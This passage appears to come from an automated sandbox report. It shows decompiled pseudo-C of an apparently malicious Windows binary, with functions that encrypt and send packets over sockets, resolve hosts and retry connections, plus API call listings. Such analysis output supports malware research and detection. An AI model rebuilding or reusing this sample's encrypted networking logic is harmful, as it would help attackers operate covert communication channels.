    					_t108 = _a4 + 8;
    				}
    				 *0x3e899c(_t108);
    				_t80 = 0x1d;
    				memcpy( &_v148, _t108, _t80 << 2);
    				_t109 =  *0x3e8538(0x14);
    				_a12 = _t109;
    				 *0x3e8ab0( &_v148, _t109);
    				memcpy( &_v32, _t109, 0 << 2);
    				 *0x3e8540(_a12, 5);
    				_t110 = _v12;
    				 *((intOrPtr*)(_t110 + 5)) = _v32;
    				_t53 = _a8;
    				if(_t53 == 0) {
    					memset(_v8, 0, 0x200);
    					_t102 = _a4;
    					_t32 = _t102 + 0x120; // 0x120
    					_t33 = _t102 + 0x110; // 0x110
    					_t35 = _t102 + 0xf0; // 0xf0
    					if(E003D3BB7(_t35, _t110, 0x1fd, _v8 + 3, _t33, _t32) == 0) {
    						goto L12;
    					} else {
    						_t79 = 0x200;
    						goto L11;
    					}
    				} else {
    					_t103 = _v8;
    					_t22 = _t53 + 0x118; // 0x118
    					_t23 = _t53 + 0x108; // 0x108
    					if(E003D3BB7(_t53 + 0xe8, _t110, 0x1fd, _t103, _t23, _t22) == 0) {
    						L13:
    						 *0x3e8540(_t110);
    						 *0x3e8540(_t103);
    						_t63 = 0;
    					} else {
    						_t71 = _a4;
    						_t25 = _t71 + 0x120; // 0x120
    						_t26 = _t71 + 0x110; // 0x110
    						if(E003D3BB7(_a4 + 0xf0, _t103, 0x1fd, _t110, _t26, _t25) == 0) {
    							goto L13;
    						} else {
    							_t79 = 0x200;
    							memset(_t103, 0, 0x200);
    							_t93 = 0x7f;
    							memcpy(_t103 + 3, _t110, _t93 << 2);
    							asm("movsb");
    							_t102 = _a4;
    							_t110 = _v12;
    							L11:
    							_t64 =  *(_t102 + 4) & 0x0000ffff;
    							__imp__#9(_t64);
    							_t88 = _v8;
    							 *_t88 = _t64;
    							_t88[0] = 3;
    							if(E003DFD0B( *_t102, _t88, _t79) == _t79) {
    								 *0x3e8540(_t110);
    								 *0x3e8540(_v8);
    								_t63 = 1;
    							} else {
    								L12:
    								_t103 = _v8;
    								goto L13;
    							}
    						}
    					}
    				}
    				return _t63;
    			}

    APIs
    • memset.MSVCRT ref: 003D43DC
    • htons.WS2_32(?), ref: 003D43F8
    • memset.MSVCRT ref: 003D44C5
    • memset.MSVCRT ref: 003D44E8
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D4524
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 48%
    			E003C99A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				char _v12;
    				void* _v16;
    				void* _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v52;
    				char _v252;
    				char _v452;
    				char _v852;
    				char* _t43;
    				char _t44;
    				intOrPtr _t50;
    				char _t51;
    				void* _t56;
    				void* _t57;
    				char* _t59;
    				intOrPtr _t62;
    				void* _t64;
    				void* _t85;
    				void* _t86;
    
    				_t43 =  &_v852;
    				_v20 = 0;
    				_t64 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				__imp__#115(0x202, _t43, __edi, __esi, __ebx);
    				if(_t43 != 0) {
    					L17:
    					_t44 = _v8;
    				} else {
    					_t64 = E003D1D90(0x100, 0);
    					_t86 = _t86 + 8;
    					if(_t64 != 0) {
    						_t50 = E003C8730(_a4);
    						_v20 = _t50;
    						if(_t50 != 0) {
    							_t51 = _v8;
    							_t85 = 0;
    							while(1) {
    								_t69 = _v12;
    								if(_v12 != 0) {
    									E003CBB40(_t69);
    									_t51 = _v8;
    									_t86 = _t86 + 4;
    								}
    								_v12 = 0;
    								_t92 = _t51;
    								if(_t51 != 0) {
    									__imp__freeaddrinfo(_t51);
    								}
    								_v8 = 0;
    								E003C9090(_t92,  &_v452, 0x22);
    								_t14 = _t85 + 0x3e32f0; // 0xb6
    								E003C9090(_t92,  &_v252,  *_t14);
    								_push( &_v252);
    								_t56 = E003D0C10(_t64, 0x80,  &_v452, _v20);
    								_t86 = _t86 + 0x24;
    								if(_t56 < 0) {
    									goto L17;
    								}
    								_t57 = E003C7E20(_t64, 0,  &_v12, 0xffffffff);
    								_t86 = _t86 + 0x10;
    								if(_t57 == 0) {
    									goto L17;
    								} else {
    									_v48 = 0;
    									_v44 = 0;
    									_v52 = 0;
    									_v40 = 0;
    									_v36 = 0;
    									_v32 = 0;
    									_v28 = 0;
    									_v24 = 0;
    									_t59 =  &_v8;
    									_v44 = 1;
    									_v48 = 2;
    									__imp__getaddrinfo(_v12, 0,  &_v52, _t59);
    									if(_t59 != 0) {
    										L14:
    										_t51 = _v8;
    										goto L15;
    									} else {
    										_t51 = _v8;
    										if(_t51 != 0) {
    											_t37 = _t85 + 0x3e802c; // 0x3caa10
    											_t62 =  *((intOrPtr*)( *_t37))( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x18)) + 4)));
    											_t86 = _t86 + 4;
    											_v16 = _t62;
    											__eflags = _t62;
    											if(__eflags != 0) {
    												goto L17;
    											} else {
    												goto L14;
    											}
    										} else {
    											_v16 = 0;
    											L15:
    											_t85 = _t85 + 4;
    											if(_t85 < 0x14) {
    												continue;
    											} else {
    											}
    										}
    									}
    								}
    								goto L18;
    							}
    						}
    					}
    					goto L17;
    				}
    				L18:
    				if(_t44 != 0) {
    					__imp__freeaddrinfo(_t44);
    				}
    				if(_t64 != 0) {
    					E003CBB40(_t64);
    					_t86 = _t86 + 4;
    				}
    				_t45 = _v20;
    				if(_v20 != 0) {
    					E003CBB40(_t45);
    				}
    				__imp__#116();
    				return _v16;
    			}

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003C99CA
    • freeaddrinfo.WS2_32(?), ref: 003C9A2B
      • Part of subcall function 003D0C10: _vsnwprintf.MSVCRT ref: 003D0C42
    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 003C9AC6
    • freeaddrinfo.WS2_32(?), ref: 003C9B0E
    • WSACleanup.WS2_32 ref: 003C9B34
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 31%
    			E003D56CF(intOrPtr* __eax, void* __ecx, void* __eflags, void* _a4) {
    				void* _v8;
    				void* _v12;
    				char _v32;
    				void _v148;
    				void* __esi;
    				short _t42;
    				short _t43;
    				short _t44;
    				void* _t60;
    				void _t61;
    				intOrPtr* _t74;
    				void* _t76;
    				signed int _t77;
    				intOrPtr* _t87;
    				void* _t95;
    				void* _t97;
    				void* _t98;
    
    				_t76 = __ecx;
    				_t74 = __eax;
    				_t95 =  *0x3e8538(0x200);
    				_v8 = _t95;
    				_v12 =  *0x3e8538(0x200);
    				memset(_t95, 0, 0x1fd);
    				 *_t95 = 0x21;
    				_t42 = E003DE937(_t76);
    				_t87 = __imp__#9;
    				 *((short*)(_t74 + 0x138)) = _t42;
    				_t43 =  *_t87(_t42);
    				 *((short*)(_t95 + 3)) = _t43;
    				_t44 =  *_t87(0x14);
    				_t77 = 5;
    				 *((short*)(_t95 + 9)) = _t44;
    				_t6 = _t95 + 0xb; // 0xb
    				memcpy(_t6, _a4, _t77 << 2);
    				_t97 = _t74 + 8;
    				 *0x3e899c(_t97, _v8, 0x1fd);
    				memcpy( &_v148, _t97, 0 << 2);
    				 *0x3e8ab0( &_v148,  &_v32, 0x1d);
    				_t98 = _v12;
    				 *((intOrPtr*)(_v8 + 5)) = _v32;
    				memset(_t98, 0, 0x200);
    				if(E003D3BB7(_t74 + 0xf0, _v8, 0x1fd, _t98 + 3, _t74 + 0x110, _t74 + 0x120) == 0) {
    					L7:
    					 *0x3e8540(_v8);
    					 *0x3e8540(_t98);
    					_t60 = 0;
    				} else {
    					_t61 =  *(_t74 + 4) & 0x0000ffff;
    					__imp__#9(_t61);
    					 *_t98 = _t61;
    					 *((char*)(_t98 + 2)) = 3;
    					if(E003DFD0B( *_t74, _t98, 0x200) != 0x200) {
    						goto L7;
    					} else {
    						if(E003DFB73( *_t74, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003D3BB7(_t74 + 0x100, _v8 + 3, 0x1fd, _v12, _t74 + 0x124, _t74 + 0x134) == 0 ||  *_v12 != 0x27) {
    							_t98 = _v12;
    							goto L7;
    						} else {
    							 *0x3e8540(_v8);
    							 *0x3e8540(_v12);
    							_t60 = 1;
    						}
    					}
    				}
    				return _t60;
    			}

    APIs
    • memset.MSVCRT ref: 003D5700
    • htons.WS2_32(00000000), ref: 003D571E
    • htons.WS2_32(00000014), ref: 003D5726
    • memset.MSVCRT ref: 003D577A
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D57B1
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBB0
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBC9
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBD8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFBED
      • Part of subcall function 003DFB73: htons.WS2_32(?), ref: 003DFC25
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCA2
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCB8
      • Part of subcall function 003DFB73: memcpy.MSVCRT ref: 003DFCD6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 22%
    			E003DEC77(void* _a4, int _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
    				void _v24;
    				void _v44;
    				void _v108;
    				void _v172;
    				char _v288;
    				void* _t46;
    				signed int _t70;
    				void* _t74;
    				void* _t82;
    				void* _t86;
    
    				memset( &_v108, 0, 0x40);
    				memset( &_v172, 0, 0x40);
    				memcpy( &_v108, _a4, _a8);
    				memcpy( &_v172, _a4, _a8);
    				_t46 = 0;
    				do {
    					 *(_t86 + _t46 - 0x68) =  *(_t86 + _t46 - 0x68) ^ 0x00000036;
    					 *(_t86 + _t46 - 0xa8) =  *(_t86 + _t46 - 0xa8) ^ 0x0000005c;
    					_t46 = _t46 + 1;
    				} while (_t46 < 0x40);
    				 *0x3e8ab4( &_v288, _t74, _t82);
    				 *0x3e899c( &_v288,  &_v108, 0x40);
    				 *0x3e899c( &_v288, _a12, _a16);
    				 *0x3e8ab0( &_v288,  &_v24);
    				_t70 = 5;
    				memcpy( &_v44,  &_v24, _t70 << 2);
    				 *0x3e8ab4( &_v288);
    				 *0x3e899c( &_v288,  &_v172, 0x40);
    				 *0x3e899c( &_v288,  &_v44, 0x14);
    				 *0x3e8ab0( &_v288,  &_v24);
    				_push(5);
    				return memcpy(_a20,  &_v24, 0 << 2);
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003D12E2
    • gethostname.WS2_32(?,000000FF), ref: 003D1302
    • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 003D1322
    • freeaddrinfo.WS2_32(00000000), ref: 003D1380
    • WSACleanup.WS2_32 ref: 003D1386
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 96%
    			E003C45F3(intOrPtr* __ebx) {
    				intOrPtr _t61;
    				intOrPtr _t63;
    				intOrPtr _t71;
    				intOrPtr* _t81;
    				intOrPtr* _t82;
    				intOrPtr _t91;
    				intOrPtr _t99;
    				signed int* _t100;
    				intOrPtr* _t102;
    				intOrPtr _t103;
    				intOrPtr _t107;
    				signed int _t111;
    				intOrPtr _t114;
    				intOrPtr _t118;
    				signed int _t121;
    				signed short* _t122;
    				intOrPtr _t128;
    				signed int _t136;
    				signed int _t141;
    				void* _t143;
    				intOrPtr _t144;
    				intOrPtr _t146;
    				intOrPtr* _t147;
    				void* _t148;
    				void* _t150;
    				void* _t151;
    
    				_t102 = __ebx;
    				do {
    					_t61 =  *0x3e8628; // 0x622508
    					 *((intOrPtr*)( *((intOrPtr*)(_t61 + 0xac))))(0x3e8594);
    					if( *(_t148 - 8) < 0) {
    						L13:
    						 *(_t148 - 8) = 0xffffffff;
    						L14:
    						_t63 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0xc4))))(0x3e8594);
    						_t22 = _t148 - 8;
    						 *_t22 =  *(_t148 - 8) + 1;
    						if( *_t22 == 0) {
    							_t144 =  *((intOrPtr*)(_t148 - 4));
    							goto L37;
    						}
    						_t141 =  *(_t148 - 0x1c);
    						_t144 = 0;
    						do {
    							_t81 = E003E1280(0, _t148 - 0x41c);
    							_t151 = _t150 + 4;
    							_push(0x1c);
    							if(_t81 == 0) {
    								L003CA47E();
    								_t150 = _t151 + 4;
    								__eflags = _t81;
    								if(_t81 == 0) {
    									L21:
    									_t82 = 0;
    									__eflags = 0;
    									L22:
    									 *((intOrPtr*)(_t148 - 0x10)) = _t82;
    									_push(_t141);
    									_push(_t148 - 0x41c);
    									if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))() != 0) {
    										 *((intOrPtr*)(_t148 - 4)) = _t144;
    										__eflags = _t144 - 5;
    										if(__eflags >= 0) {
    											L32:
    											_t111 =  *(_t148 - 0xc) + 1;
    											 *(_t148 - 0xc) = _t111;
    											if(_t111 > 0x4b0) {
    												goto L38;
    											}
    											if(_t111 != (0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2) + ((0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2)) * 4 + (0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2) + ((0x66666667 * _t111 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t111 >> 0x20 >> 2)) * 4) {
    												_t91 =  *0x3e8628; // 0x622508
    												 *((intOrPtr*)( *((intOrPtr*)(_t91 + 0xc8))))(0x3e8);
    											} else {
    												_t114 =  *0x3e8628; // 0x622508
    												 *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xc8))))(0xea60);
    											}
    											goto L37;
    										}
    										_t146 = 0;
    										__eflags = 0;
    										while(1) {
    											__eflags = E003C90F0(_t102,  *((intOrPtr*)(_t102 + 0x18)), _t141, _t146, _t148 - 0x18,  *_t102,  *((intOrPtr*)(_t102 + 4)),  *((intOrPtr*)(_t102 + 8)),  *((intOrPtr*)(_t102 + 0xc)),  *((intOrPtr*)(_t102 + 0x10)),  *((intOrPtr*)(_t102 + 0x14)));
    											if(__eflags != 0) {
    												break;
    											}
    											_t118 =  *0x3e8628; // 0x622508
    											 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0xc8))))(0x3e8);
    											_t146 = _t146 + 1;
    											__eflags = _t146 - 3;
    											if(__eflags < 0) {
    												continue;
    											}
    											 *((intOrPtr*)(_t148 - 4)) = _t146;
    											L31:
    											_t144 =  *((intOrPtr*)(_t148 - 4));
    											goto L32;
    										}
    										 *((intOrPtr*)(_t148 - 4)) = 0;
    										goto L31;
    									}
    									goto L23;
    								}
    								_t82 = E003E1D30(_t81);
    								goto L22;
    							}
    							L003CA47E();
    							_t150 = _t151 + 4;
    							if(_t81 == 0) {
    								goto L21;
    							}
    							_t82 = L003E1DC0(_t81);
    							goto L22;
    							L23:
    							_t144 = _t144 + 1;
    						} while (_t144 < 5);
    						 *((intOrPtr*)(_t148 - 4)) = _t144;
    						goto L32;
    					}
    					_t103 =  *((intOrPtr*)(_t102 + 0x18));
    					_t99 =  *((intOrPtr*)(_t103 + 8));
    					_t121 =  *(_t148 - 8);
    					if(_t121 >=  *((intOrPtr*)(_t99 + 0x18))) {
    						L12:
    						_t102 =  *((intOrPtr*)(_t148 + 8));
    						goto L13;
    					}
    					_t122 =  *( *((intOrPtr*)(_t99 + 0x1c)) + _t121 * 4);
    					_t147 = 0x200;
    					_t100 = _t148 - 0x41c;
    					_t143 = 0;
    					while(1) {
    						_t11 = _t147 + 0x7ffffdfe; // 0x7ffffffe
    						if(_t11 == 0) {
    							break;
    						}
    						_t136 =  *_t122 & 0x0000ffff;
    						if(_t136 == 0) {
    							break;
    						}
    						 *_t100 = _t136;
    						_t100 =  &(_t100[0]);
    						_t122 =  &(_t122[1]);
    						_t147 = _t147 - 1;
    						if(_t147 != 0) {
    							continue;
    						}
    						L9:
    						_t100 = _t100 - 2;
    						_t143 = 0x8007007a;
    						L10:
    						 *_t100 = 0;
    						if(_t143 < 0) {
    							goto L12;
    						}
    						_t102 =  *((intOrPtr*)(_t148 + 8));
    						 *(_t148 - 0x1c) =  *( *((intOrPtr*)( *((intOrPtr*)(_t103 + 8)) + 0x20)) +  *(_t148 - 8) * 4) & 0x0000ffff;
    						goto L14;
    					}
    					__eflags = _t147;
    					if(__eflags != 0) {
    						goto L10;
    					}
    					goto L9;
    					L37:
    				} while (_t144 > 0);
    				L38:
    				_t65 =  *_t102;
    				if( *_t102 != 0) {
    					E003CBB40(_t65);
    					_t150 = _t150 + 4;
    				}
    				_t66 =  *((intOrPtr*)(_t102 + 4));
    				if( *((intOrPtr*)(_t102 + 4)) != 0) {
    					E003CBB40(_t66);
    					_t150 = _t150 + 4;
    				}
    				_t67 =  *((intOrPtr*)(_t102 + 8));
    				if( *((intOrPtr*)(_t102 + 8)) != 0) {
    					E003CBB40(_t67);
    					_t150 = _t150 + 4;
    				}
    				_t68 =  *((intOrPtr*)(_t102 + 0x10));
    				if( *((intOrPtr*)(_t102 + 0x10)) != 0) {
    					E003CBB40(_t68);
    					_t150 = _t150 + 4;
    				}
    				_t69 =  *((intOrPtr*)(_t102 + 0xc));
    				if( *((intOrPtr*)(_t102 + 0xc)) != 0) {
    					E003CBB40(_t69);
    					_t150 = _t150 + 4;
    				}
    				E003CBB40(_t102);
    				_t71 =  *((intOrPtr*)(_t148 - 0x10));
    				 *((intOrPtr*)(_t148 - 0x18)) = 0x3e32ec;
    				if(_t71 != 0) {
    					_push(_t71);
    					L003C1CB0();
    				}
    				_t128 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t128 + 0xac))))(0x3e8600);
    				_t107 =  *0x3e8628; // 0x622508
    				 *0x3e8618 =  *0x3e8618 - 1;
    				 *((intOrPtr*)( *((intOrPtr*)(_t107 + 0xc4))))(0x3e8600);
    				return 0;
    			}

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003C46DE
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • ??3@YAXPAX@Z.MSVCRT ref: 003C4838
      • Part of subcall function 003E1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1D73
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 94%
    			E003CF850(void* __ebx, void* __ecx) {
    				intOrPtr _t29;
    				intOrPtr _t34;
    				void* _t47;
    				intOrPtr _t51;
    				intOrPtr _t55;
    				void* _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				void* _t61;
    				intOrPtr _t62;
    				void* _t63;
    
    				_t47 = __ebx;
    				_t61 = __ecx;
    				_t19 =  *((intOrPtr*)(__ecx + 0x14));
    				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
    					E003CBB40(_t19);
    					_t63 = _t63 + 4;
    				}
    				_t20 =  *((intOrPtr*)(_t61 + 0x28));
    				if( *((intOrPtr*)(_t61 + 0x28)) != 0) {
    					E003CBB40(_t20);
    					_t63 = _t63 + 4;
    				}
    				_t21 =  *((intOrPtr*)(_t61 + 0x1c));
    				if( *((intOrPtr*)(_t61 + 0x1c)) != 0) {
    					E003CBB40(_t21);
    					_t63 = _t63 + 4;
    				}
    				_t22 =  *((intOrPtr*)(_t61 + 0x2c));
    				if( *((intOrPtr*)(_t61 + 0x2c)) != 0) {
    					E003CBB40(_t22);
    					_t63 = _t63 + 4;
    				}
    				_t23 =  *((intOrPtr*)(_t61 + 0x20));
    				if( *((intOrPtr*)(_t61 + 0x20)) != 0) {
    					E003CBB40(_t23);
    					_t63 = _t63 + 4;
    				}
    				_t24 =  *((intOrPtr*)(_t61 + 0x18));
    				if( *((intOrPtr*)(_t61 + 0x18)) != 0) {
    					E003CBB40(_t24);
    					_t63 = _t63 + 4;
    				}
    				E003C16B0(_t61 + 0x30);
    				_t26 =  *((intOrPtr*)(_t61 + 0x64));
    				if( *((intOrPtr*)(_t61 + 0x64)) != 0) {
    					E003CBB40(_t26);
    					_t63 = _t63 + 4;
    				}
    				_t27 =  *((intOrPtr*)(_t61 + 0x5c));
    				if( *((intOrPtr*)(_t61 + 0x5c)) != 0) {
    					E003CBB40(_t27);
    					_t63 = _t63 + 4;
    				}
    				_t28 =  *((intOrPtr*)(_t61 + 0x60));
    				if( *((intOrPtr*)(_t61 + 0x60)) != 0) {
    					E003CBB40(_t28);
    					_t63 = _t63 + 4;
    				}
    				_t29 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t29 + 0xac))))(0x3e8594, _t57);
    				_t58 =  *((intOrPtr*)(_t61 + 4));
    				if(_t58 != 0) {
    					E003C6E10(_t47, _t58);
    					_push(_t58);
    					L003C1CB0();
    					_t63 = _t63 + 4;
    				}
    				_t59 =  *((intOrPtr*)(_t61 + 0xc));
    				if(_t59 != 0) {
    					E003C6730(_t59);
    					_push(_t59);
    					L003C1CB0();
    					_t63 = _t63 + 4;
    				}
    				_t55 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xc4))))(0x3e8594);
    				 *((intOrPtr*)(_t61 + 0x4fc)) = 0x3e32ec;
    				_t62 =  *((intOrPtr*)(_t61 + 0x504));
    				if(_t62 != 0) {
    					_push(_t62);
    					L003C1CB0();
    				}
    				_t51 =  *0x3e8628; // 0x622508
    				 *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xac))))(0x3e8600);
    				_t34 =  *0x3e8628; // 0x622508
    				 *0x3e8618 =  *0x3e8618 - 1;
    				return  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc4))))(0x3e8600);
    			}

    APIs
      • Part of subcall function 003C16B0: memset.MSVCRT ref: 003C16EE
    • ??3@YAXPAX@Z.MSVCRT ref: 003CF955
      • Part of subcall function 003C6E10: ??3@YAXPAX@Z.MSVCRT ref: 003C6E42
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • ??3@YAXPAX@Z.MSVCRT ref: 003CF90D
    • ??3@YAXPAX@Z.MSVCRT ref: 003CF924
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 29%
    			E003D4FF4(intOrPtr __eax) {
    				void* _t12;
    				void* _t13;
    				char* _t21;
    				void* _t24;
    				void* _t34;
    				char* _t42;
    				char* _t45;
    				void* _t47;
    				intOrPtr* _t49;
    
    				_pop(_t34);
